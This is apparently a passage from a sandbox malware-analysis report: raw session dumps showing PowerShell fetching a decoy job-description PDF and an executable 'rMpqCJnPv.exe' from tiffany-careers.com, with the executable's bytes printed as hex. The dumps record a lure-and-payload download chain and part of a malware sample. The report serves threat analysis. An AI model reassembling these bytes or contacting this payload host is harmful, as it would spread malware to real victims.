                                                                                                                  2024-12-23 06:11:35 UTC16384INData Raw: fc 8d 41 28 57 8b 7d fc 89 45 fc 3b f8 74 3b 53 56 8b 1f 85 db 74 24 8b f3 8b 5b 04 8d 4e 08 e8 c0 e8 ff ff 56 6a 00 ff 15 f4 11 41 00 50 ff 15 dc 12 41 00 85 db 75 df 8b 45 fc c7 07 00 00 00 00 83 c7 04 3b f8 75 c9 5e 5b 5f c9 c3 8b ff 55 8b ec 56 57 8b 39 33 f6 56 6a ff 57 ff 15 30 12 41 00 b9 80 00 00 00 3d 02 01 00 00 74 08 85 c0 74 0c 3b c1 75 15 85 c0 74 04 3b c1 75 02 8b f7 8b 45 08 5f 89 30 5e 5d c2 10 00 51 8b 4d 04 e8 1e e4 ff ff cc 8b ff 55 8b ec 51 53 56 8b f1 8b da 33 c9 57 3b f3 74 45 8b 7d 08 85 ff 74 3e 66 39 0f 74 39 8b cf e8 47 df ff ff 2b de 89 45 fc 3b d8 73 0c 8b 45 0c 85 c0 74 2b 83 20 00 eb 26 50 57 53 56 ff 15 1c 14 41 00 8b 45 0c 83 c4 10 85 c0 74 02 89 30 8b 45 fc 03 c6 eb 0b 8b 45 0c 85 c0 74 02 89 08 8b c6 5f 5e 5b c9 c2 08 00
                                                                                                                  Data Ascii: A(W}E;t;SVt$[NVjAPAuE;u^[_UVW93VjW0A=tt;ut;uE_0^]QMUQSV3W;tE}t>f9t9G+E;sEt+ &PWSVAEt0EEt_^[
                                                                                                                  2024-12-23 06:11:35 UTC16384INData Raw: ac 31 01 00 7c 31 01 00 42 31 01 00 16 31 01 00 ec 30 01 00 c0 30 01 00 8e 30 01 00 60 30 01 00 30 30 01 00 fe 2f 01 00 c0 2f 01 00 8e 2f 01 00 6c 2f 01 00 0e 2f 01 00 da 2e 01 00 b6 2e 01 00 90 2e 01 00 48 2e 01 00 f8 2d 01 00 a8 2d 01 00 5a 2d 01 00 26 2d 01 00 f0 2c 01 00 b0 2c 01 00 6a 2c 01 00 40 2c 01 00 1a 2c 01 00 ec 2b 01 00 c0 2b 01 00 78 2b 01 00 48 2b 01 00 20 2b 01 00 e6 2a 01 00 aa 2a 01 00 72 2a 01 00 2c 2a 01 00 fa 29 01 00 a6 29 01 00 7a 29 01 00 4c 29 01 00 1e 29 01 00 f4 28 01 00 b2 28 01 00 56 28 01 00 20 28 01 00 ca 27 01 00 7a 27 01 00 3c 27 01 00 06 27 01 00 d0 26 01 00 7e 26 01 00 4c 26 01 00 22 26 01 00 ee 25 01 00 a8 25 01 00 6a 25 01 00 32 25 01 00 e4 24 01 00 a8 24 01 00 74 24 01 00 3e 24 01 00 08 24 01 00 cc 23 01 00 8e 23 01
                                                                                                                  Data Ascii: 1|1B11000`000///l//...H.--Z-&-,,j,@,,++x+H+ +**r*,*))z)L))((V( ('z'<''&~&L&"&%%j%2%$$t$>$$##


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.549708147.45.49.1554432608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-23 06:11:40 UTC88OUTGET /Job_Description.pdf HTTP/1.1
                                                                                                                  Host: tiffany-careers.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-12-23 06:11:40 UTC430INHTTP/1.1 200 OK
                                                                                                                  etag: "347816-67604c7c-2538f;;;"
                                                                                                                  last-modified: Mon, 16 Dec 2024 15:51:24 GMT
                                                                                                                  content-type: application/pdf
                                                                                                                  content-length: 3438614
                                                                                                                  accept-ranges: bytes
                                                                                                                  date: Mon, 23 Dec 2024 06:11:40 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                  connection: close
                                                                                                                  2024-12-23 06:11:40 UTC16384INData Raw: 25 50 44 46 2d 31 2e 36 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 56 65 72 73 69 6f 6e 20 2f 31 2e 36 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 36 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 4c 65 6e 67 74 68 20 35 32 36 35 34 39 0a 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 0a 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 0a 2f 46 69 6c 74 65 72 20 2f 44 43 54 44 65 63 6f 64 65 0a 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 38 0a 2f 57 69 64 74 68 20 32 34 38 30 0a 2f 48 65 69 67 68 74 20 33 35 30 38 0a 2f 43 6f 6c 6f 72 53 70 61 63 65 20 2f 44 65 76 69 63 65 52 47 42 0a 3e 3e 0a 73 74 72 65 61 6d 0d 0a ff d8 ff e1 16 2b 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07
                                                                                                                  Data Ascii: %PDF-1.6%1 0 obj<</Type /Catalog/Version /1.6/Pages 2 0 R>>endobj6 0 obj<</Length 526549/Type /XObject/Subtype /Image/Filter /DCTDecode/BitsPerComponent 8/Width 2480/Height 3508/ColorSpace /DeviceRGB>>stream+ExifMM*
                                                                                                                  2024-12-23 06:11:40 UTC16384INData Raw: 2f 70 64 66 22 2f 3e 20 3c 72 64 66 3a 6c 69 20 73 74 45 76 74 3a 61 63 74 69 6f 6e 3d 22 73 61 76 65 64 22 20 73 74 45 76 74 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 36 39 35 37 38 37 34 37 33 34 39 30 45 42 31 31 39 36 45 42 45 35 33 46 34 33 36 44 30 45 36 31 22 20 73 74 45 76 74 3a 77 68 65 6e 3d 22 32 30 32 31 2d 30 33 2d 32 39 54 31 30 3a 31 32 3a 35 37 2b 30 38 3a 30 30 22 20 73 74 45 76 74 3a 73 6f 66 74 77 61 72 65 41 67 65 6e 74 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 22 20 73 74 45 76 74 3a 63 68 61 6e 67 65 64 3d 22 2f 22 2f 3e 20 3c 72 64 66 3a 6c 69 20 73 74 45 76 74 3a 61 63 74 69 6f 6e 3d 22 73 61 76 65 64 22 20 73 74 45 76 74 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22
                                                                                                                  Data Ascii: /pdf"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:695787473490EB1196EBE53F436D0E61" stEvt:when="2021-03-29T10:12:57+08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="
                                                                                                                  2024-12-23 06:11:41 UTC16384INData Raw: bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a b4 71 57 a7 79 06 42 f6 86 bd 8e 2a a5 e7 f8 b9 5b 86 a5 69 df 15 79 aa 74 c5 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 aa d6 30 7a f3 a2 d6 94 61 8a bd ae dc 52 35 1e 0a 31 57 9b fe 63 ff 00 bd f1 ff 00 ab 98 59 b9 bd 57 65 fd 05 8b e5 0e d9 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 aa 65 e5 ef f7 b1 3f d6 c9 c3 9b 8b aa fa 0b d6 ee bf b8 6f f5 4f ea cd 81 78 d8 7d 4f 1a d4 3f bf 6f 99 cd 69 e6 f7 18 be 94 3e 06 c7 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ac ef f2 d2 62 eb 32 f8 66 56 02 f3 fd ab 1a a4 fb ce df f1 c6 ba ff 00 8c 67 32 9e 7d f2 45 bf d8 fa 4f eb c5 55 71 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 55 ad db e6 31 57 d2 5f 93 f7 4b 3e 97 f0 fe c9 a6 2a 92 7e 7a d8 7a b6 e9
                                                                                                                  Data Ascii: v*UWb]qWyB*[iytWb]v*UWb0zaR51WcYWeWb]v*Ue?oOx}O?oi>b]v*UWbb2fVg2}EOUqWb]v*UU1W_K>*~zz
                                                                                                                  2024-12-23 06:11:41 UTC16384INData Raw: f4 67 72 c6 24 52 8d d0 e6 5b ce be 59 fc c8 d2 9f 4f d6 e7 04 52 22 7e 1c 55 8d 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ad 1f e3 8a be 85 fc 8e ff 00 8e 63 ff 00 ad 8a a4 bf 9f 9d 21 f9 62 af 14 5e 98 ab 78 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 aa eb 5f f7 aa 0f f8 ca bf af 15 7d 87 a7 7f bc d1 7f a8 bf ab 15 79 1f e7 5d 81 37 29 75 4d 82 d2 b9 ae d4 8d ed ed fb 03 27 a4 c5 e6 03 71 98 2f 58 5d 8a 1d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 59 a7 e5 2d 93 5d ea 6d c7 f6 37 39 93 a7 16 5d 1f 6d 64 e0 c7 ef 7b f0 1b 53 36 cf 9c bc 23 f3 7b 46 6b 7d 4c de 81 48 d8 66 ab 51 1a 36 fa 17 62 67 e2 c7 c1 d5 82 66 2b d0 bb 14 3b 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5a 6e 98 a4 3d 9f f2 57 fd e7 97 36 5a 67 87 ed ef a8 3d 22 ea dd 6e 63 68 5f 75 61
                                                                                                                  Data Ascii: gr$R[YOR"~Ub]v*UWbc!b^xWb]v*U_}y]7)uM'q/X]v*UWbY-]m79]md{S6#{Fk}LHfQ6bgf+;v*UWbZn=W6Zg="nch_ua
                                                                                                                  2024-12-23 06:11:41 UTC16384INData Raw: 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a a1 35 14 aa 72 c5 52 bc 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 aa 2f 4e 4e 4e 4e 2a 99 b7 4c 55 26 b8 fb 67 15 52 c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a a3 f4 bf da c5 51 37 bf dc bf cb 01 6c c7 cc 31 04 e9 98 ee e4 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5c 71 56 43 a1 7f 74 72 e8 ba cd 47 36 b5 df ee f0 49 3a 7e 6c 79 7a 65 4e c9 bc 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 cb f6 97 e6 31 41 e4 cc a3 fb 23 e5 99 0e 90 f3 62 1f 98 76 3c ad be b2 37 2b b6 14 3c e9 7a 0c 55 bc 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 95 fe 5d 59 fa b7 4e ec 3e 10 36 c5 5e 89 77 fd cb ff 00 aa 71 57 8b df ff 00 7e df 33 8a a8 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab
                                                                                                                  Data Ascii: b]v*UWb]5rRUWb]v*U/NNNN*LU&gR]v*UWb]Q7l1]v*UWb\qVCtrG6I:~lyzeNUWb]v*U1A#bv<7+<zUUWb]v*U]YN>6^wqW~3b]v*U
                                                                                                                  2024-12-23 06:11:41 UTC16384INData Raw: f7 8e 5f f5 0f ea c5 5f 25 6b 7f ef 64 9f eb 1f d7 8a a0 f1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 56 47 f9 77 a0 3e b5 ab 44 14 72 85 0f c7 8a be a6 b6 b7 4b 78 d6 28 c5 15 45 00 c5 52 bf 38 7f c7 26 e7 fe 31 9c af 27 d2 5c ed 0f f7 b1 fe b3 e6 0b 7f b3 f4 9c d2 3e af 2e 6a 98 b0 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 14 b3 ef ca 1f 2d 9b eb c1 a9 30 ac 51 ed f4 e6 5e 9e 16 6d e7 3b 6f 55 e1 c3 c3 fe 29 3d d4 0a 6c 33 68 f9 fb 1b fc c0 d2 ce a3 a4 cd 1a 0a c9 4d b2 9c d1 b8 bb 4e cd cd e1 e5 04 f2 7c e0 62 30 31 85 fe d2 6c 73 4d 54 fa 7d f1 6e 1d 8a 1d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae 38 a5 9d fe 51 68 86 ef 50 6b 87 1f bb e3 99 5a 78 d9 b7 9e ed bd 47 06 3e 11 f5 3f ff d5 f5 26 04 bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a
                                                                                                                  Data Ascii: __%kdWb]v*UVGw>DrKx(ER8&1'\>.jv*UWb]-0Q^m;oU)=l3hMN|b01lsMT}nv*UWb8QhPkZxG>?&v*UWb]v*
                                                                                                                  2024-12-23 06:11:41 UTC16384INData Raw: 75 46 2a d7 31 e3 8a a2 ad 74 db 9b a2 04 28 58 1e e3 15 67 1e 5c f2 2a c3 49 ee fe 23 d7 8f 86 2a cc e3 8d 63 50 aa 28 06 2a bb 15 76 2a ec 55 8e f9 9f ca a9 aa a9 92 3f 86 50 3a e5 39 31 f1 3b 3d 26 b0 e1 34 7e 97 9b 5f 69 93 d8 b1 49 94 80 3b e6 19 89 0f 51 8f 2c 72 0b 08 50 e0 f4 39 16 ea 75 71 43 75 c5 5d 5c 55 d5 c5 5a 2c 07 53 8a 69 5a da d2 6b a3 c6 05 2d f2 c2 05 b5 ce 62 1c de 83 e5 4f 27 ad a0 17 37 23 93 9d c0 3d b3 2f 1e 3a dc bc de b3 5d c7 e9 8b 2e cc 87 4c a7 70 85 e3 65 1d 48 23 01 65 13 45 e3 9a e5 ab 5a 5d 34 72 75 a9 cd 74 85 17 b7 d3 cf 8e 36 10 55 c8 b7 ba b8 ab ab 8a ba b8 ab ab 8a ba b8 ab ab 8a ba b8 ab ab 8a ad 66 00 6f 8a 40 7a 4f e5 fd b3 c7 03 3b 0a 06 e9 99 98 46 cf 2f da 52 06 54 9b 79 b6 d5 ee f4 bb 88 23 15 77 42 00 cc 87
                                                                                                                  Data Ascii: uF*1t(Xg\*I#*cP(*v*U?P:91;=&4~_iI;Q,rP9uqCu]\UZ,SiZk-bO'7#=/:].LpeH#eEZ]4rut6Ufo@zO;F/RTy#wB
                                                                                                                  2024-12-23 06:11:41 UTC16384INData Raw: ed 5f 0c 55 e9 56 d7 29 70 82 58 8d 54 f7 c5 55 71 57 62 ae c5 5d 8a b1 bf 31 f9 c2 1d 35 0a c5 f1 c9 d2 83 b6 2a f3 8b fd 56 e3 50 62 d7 0d c8 1e 83 15 42 05 03 a6 2a de 2a ec 55 d8 ab b1 57 62 ad 36 2a f4 3f cb 9f ee a4 c5 59 9e 2a ec 55 a6 60 a0 b3 6c 06 29 02 d8 6f 99 bc ec b0 03 05 a6 ed fc c3 31 a7 96 b9 3b bd 26 83 8b 79 30 3b bb b9 6f 1b 95 c3 72 39 8a 4d bd 0c 20 21 f4 a9 01 4c 0c dd 8a bb 15 76 2a ec 55 d8 ab 47 b7 cf 15 7a c7 93 ff 00 de 31 99 f8 f9 3c 7e bb eb 4f 72 d7 5e c2 7c e7 e6 cf 43 fd 12 d4 fc 47 62 47 6c c6 c9 92 b6 0e f7 41 a3 e2 f5 49 80 92 58 f3 73 56 3d 4e 62 3d 1f 2d 83 b1 57 62 ae c5 5d 8a bb 15 76 2a e2 2b d7 15 4d 34 0d 7e 6d 26 51 43 58 89 dc 65 90 9f 0b 89 a9 d3 0c c3 fa 4f 57 d3 af e3 be 85 67 88 d4 1c ce 89 b7 8f cb 8c e3
                                                                                                                  Data Ascii: _UV)pXTUqWb]15*VPbB**UWb6*?Y*U`l)o1;&y0;or9M !Lv*UGz1<~Or^|CGbGlAIXsV=Nb=-Wb]v*+M4~m&QCXeOWg
                                                                                                                  2024-12-23 06:11:41 UTC16384INData Raw: ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a
                                                                                                                  Data Ascii: UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*
                                                                                                                  2024-12-23 06:11:41 UTC16384INData Raw: 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76 2a ec 55 d8 ab b1 57 62 ae c5 5d 8a bb 15 76
                                                                                                                  Data Ascii: *UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v*UWb]v


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.549714147.45.49.1554432608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-23 06:11:49 UTC58OUTGET /rMpqCJnPv.exe HTTP/1.1
                                                                                                                  Host: tiffany-careers.com
                                                                                                                  2024-12-23 06:11:49 UTC439INHTTP/1.1 200 OK
                                                                                                                  etag: "108a00-676710df-23c45;;;"
                                                                                                                  last-modified: Sat, 21 Dec 2024 19:02:55 GMT
                                                                                                                  content-type: application/x-executable
                                                                                                                  content-length: 1083904
                                                                                                                  accept-ranges: bytes
                                                                                                                  date: Mon, 23 Dec 2024 06:11:49 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                  connection: close
                                                                                                                  2024-12-23 06:11:49 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6f 31 29 eb 2b 50 47 b8 2b 50 47 b8 2b 50 47 b8 9f cc b6 b8 3e 50 47 b8 9f cc b4 b8 b7 50 47 b8 9f cc b5 b8 0a 50 47 b8 b5 f0 80 b8 2a 50 47 b8 79 38 42 b9 05 50 47 b8 79 38 43 b9 3a 50 47 b8 79 38 44 b9 23 50 47 b8 22 28 c4 b8 23 50 47 b8 22 28 c0 b8 2a 50 47 b8 22 28 d4 b8 0e 50 47 b8 2b 50 46 b8 06 52 47 b8 8e 39 49 b9 7b 50 47 b8 8e 39 44 b9 2a 50 47 b8 8e 39 b8 b8 2a 50 47
                                                                                                                  Data Ascii: MZ@0!L!This program cannot be run in DOS mode.$o1)+PG+PG+PG>PGPGPG*PGy8BPGy8C:PGy8D#PG"(#PG"(*PG"(PG+PFRG9I{PG9D*PG9*PG
                                                                                                                  2024-12-23 06:11:49 UTC16384INData Raw: c0 48 8d 45 20 48 8b d6 4c 8d 45 28 48 89 44 24 20 e8 5e f5 ff ff 85 c0 0f 88 96 70 04 00 48 8d 4d c0 e8 55 54 00 00 44 8b 45 20 e9 00 ff ff ff 48 8d 0d f9 ba 0e 00 e8 5c 09 00 00 33 c0 4c 8d 5c 24 70 49 8b 5b 30 49 8b 73 38 49 8b e3 41 5f 41 5e 5d c3 48 89 5c 24 08 48 89 7c 24 10 55 48 8b ec 48 83 ec 70 41 8b 18 45 33 db ff cb 44 89 5d c8 4c 8b d1 89 5d b4 49 8b f8 4c 89 5d d0 c7 45 d8 01 00 00 00 41 8b cb 44 89 5d e0 45 8a cb 4c 89 5d e8 c7 45 f0 01 00 00 00 c7 45 b0 02 00 00 00 44 8b 07 41 8b d0 41 8d 40 01 89 07 e8 75 06 00 00 48 85 c0 74 2c 45 84 c9 75 27 48 8b 40 08 48 8b 10 66 44 39 5a 08 75 d7 8b 12 83 ea 0b 74 4f 83 fa 01 75 cb 85 c9 75 42 44 8a ca 44 89 45 b8 eb be 49 8d 8a 68 02 00 00 48 8d 55 b0 e8 98 07 00 00 8d 43 01 48 8d 4d e0 89 07 e8 de
                                                                                                                  Data Ascii: HE HLE(HD$ ^pHMUTDE H\3L\$pI[0Is8IA_A^]H\$H|$UHHpAE3D]L]IL]EAD]EL]EEDAA@uHt,Eu'H@HfD9ZutOuuBDDEIhHUCHM
                                                                                                                  2024-12-23 06:11:50 UTC16384INData Raw: 84 24 88 00 00 00 89 74 24 50 4d 8b c5 48 89 44 24 48 8b d7 8b 84 24 18 01 00 00 89 44 24 40 8b 84 24 20 01 00 00 89 44 24 38 8b 44 24 60 89 5c 24 30 44 89 74 24 28 89 44 24 20 e8 5c 00 00 00 48 8b b4 24 28 01 00 00 8b d8 48 8b ce e8 8e 87 00 00 48 8b ce c7 46 10 01 00 00 00 89 1e e8 59 73 00 00 85 c0 0f 84 71 49 04 00 83 ff 1d 74 08 49 8b cd e8 ac bf 01 00 45 33 f6 48 8d 4c 24 70 e8 5b 87 00 00 41 8b c6 48 81 c4 c8 00 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5d 5b c3 48 8b c4 48 89 58 20 4c 89 40 18 48 89 48 08 55 56 57 41 54 41 55 41 56 41 57 48 8d 68 c1 48 81 ec 90 00 00 00 8b 3d e1 80 0e 00 45 33 ed 41 8b d9 44 8b fa 83 fa 0c 0f 84 33 49 04 00 83 fa 0d 7e 1b 83 fa 0f 0f 8e 25 49 04 00 83 fa 11 0f 84 1c 49 04 00 83 fa 14 0f 84 13 49 04 00 83 ff ff 0f 84 36
                                                                                                                  Data Ascii: $t$PMHD$H$D$@$ D$8D$`\$0Dt$(D$ \H$(HHFYsqItIE3HL$p[AHA_A^A]A\_^][HHX L@HHUVWATAUAVAWHhH=E3AD3I~%III6
                                                                                                                  2024-12-23 06:11:50 UTC16384INData Raw: c1 89 83 c8 00 00 00 3b 53 1c 0f 8d e6 42 04 00 4c 63 9d 58 01 00 00 41 3b d3 0f 8f eb 42 04 00 8b 43 18 48 8b 7b 10 41 2b c1 49 63 d0 8b 04 87 89 04 97 41 8d 40 01 48 8b 7c 24 48 49 8b d7 48 2b 93 98 00 00 00 48 d1 fa 48 63 c8 48 8b 43 10 89 14 88 8b 95 48 01 00 00 45 3b d8 0f 8f 8e fb ff ff 45 8d 58 02 44 89 9d 58 01 00 00 e9 7e fb ff ff 83 ff 10 0f 85 39 03 00 00 8b 95 48 01 00 00 49 83 c6 06 e9 af fa ff ff 49 83 c6 02 83 c7 ab 49 8b ce 40 f6 c7 01 74 06 41 bd 01 00 00 00 46 0f be 9c 1f f8 80 0c 00 8b c7 48 8d 3d 4e 33 ff ff 44 89 5c 24 58 44 0f be 94 38 e8 80 0c 00 44 89 54 24 50 45 85 d2 75 0c b8 ff ff ff 7f 44 8b d0 89 44 24 50 bf 01 00 00 00 45 0f b7 0e 4c 8d 71 02 44 89 4c 24 54 41 8d 41 f1 83 f8 01 0f 86 da 6d 04 00 48 c7 c0 ff ff ff ff 8b c8 89
                                                                                                                  Data Ascii: ;SBLcXA;BCH{A+IcA@H|$HIH+HHcHCHE;EXDX~9HIII@tAFH=N3D\$XD8DT$PEuDD$PELqDL$TAAmH
                                                                                                                  2024-12-23 06:11:50 UTC16384INData Raw: 00 00 49 8b 0c df 49 8b d5 e8 16 40 01 00 49 89 3c df 48 ff c3 49 3b de 72 e8 4c 8b 6c 24 48 e9 cf fa ff ff 4c 8d 3d d5 f3 fe ff 49 8b 5c fd 00 48 85 db 74 61 48 8b 73 08 48 85 f6 74 36 48 8b 46 18 ff 08 48 8b 46 18 44 39 30 75 16 48 8b 0e e8 cf 3f 01 00 48 8b 4e 18 ba 04 00 00 00 e8 c1 3f 01 00 ba 20 00 00 00 48 8b ce e8 b4 3f 01 00 4c 89 73 08 8b 43 10 83 f8 05 0f 8d f6 00 00 00 b8 01 00 00 00 44 89 33 48 8b cb 89 43 10 8d 50 17 e8 8e 3f 01 00 4d 89 74 fd 00 48 ff c7 49 3b fc 72 88 e9 62 fa ff ff 44 8b 5c 24 40 45 33 c0 48 8b 9d a8 00 00 00 e9 ac f6 ff ff 41 83 e9 01 0f 88 dd fa ff ff 41 ff c2 41 ff c0 e9 a0 fa ff ff 48 8b 9d b0 00 00 00 48 8b cb c6 00 00 e8 fd 06 00 00 49 8b c7 89 43 10 33 c0 89 03 e9 93 f8 ff ff 49 8b 0a 48 8b 17 48 85 c0 74 20 44 0f
                                                                                                                  Data Ascii: II@I<HI;rLl$HL=I\HtaHsHt6HFHFD90uH?HN? H?LsCD3HCP?MtHI;rbD\$@E3HAAAHHIC3IHHt D
                                                                                                                  2024-12-23 06:11:50 UTC16384INData Raw: e8 db c7 ff ff 48 8d 15 94 9e 0d 00 49 8b cc e8 dc 05 00 00 c6 44 24 51 00 e9 86 fd ff ff 80 7c 24 51 00 0f 85 89 aa 04 00 49 8b dc e9 93 fd ff ff 44 8b 6c 24 40 4c 8b 64 24 48 4c 8b 74 24 38 4c 89 64 24 58 4c 89 b5 88 00 00 00 45 85 ed 0f 84 c6 b6 04 00 41 83 fd 01 0f 85 d0 b6 04 00 49 8b d6 48 8d 4d 90 48 c7 45 98 00 00 00 00 e8 7d 05 00 00 48 8d 4d 90 e8 3c fe fe ff 84 c0 0f 85 75 02 00 00 83 fb 07 75 62 48 8b 55 78 4d 8b c7 e8 9b 94 00 00 85 c0 0f 88 f3 b8 04 00 83 fb 08 0f 84 a2 b6 04 00 41 83 fd 01 0f 85 b5 b6 04 00 49 8b de 48 8b cb e8 25 c7 ff ff c6 03 00 80 7c 24 34 00 c7 43 10 09 00 00 00 0f 85 ae b6 04 00 80 7d 88 00 0f 84 c6 b6 04 00 b0 01 48 ff cf 88 45 89 48 89 7c 24 78 88 44 24 34 48 8d 4d 90 e8 ec c6 ff ff 48 8b 7d 78 e9 fe ef ff ff 83 f8
                                                                                                                  Data Ascii: HID$Q|$QIDl$@Ld$HLt$8Ld$XLEAIHMHE}HM<uubHUxMAIH%|$4C}HEH|$xD$4HMH}x
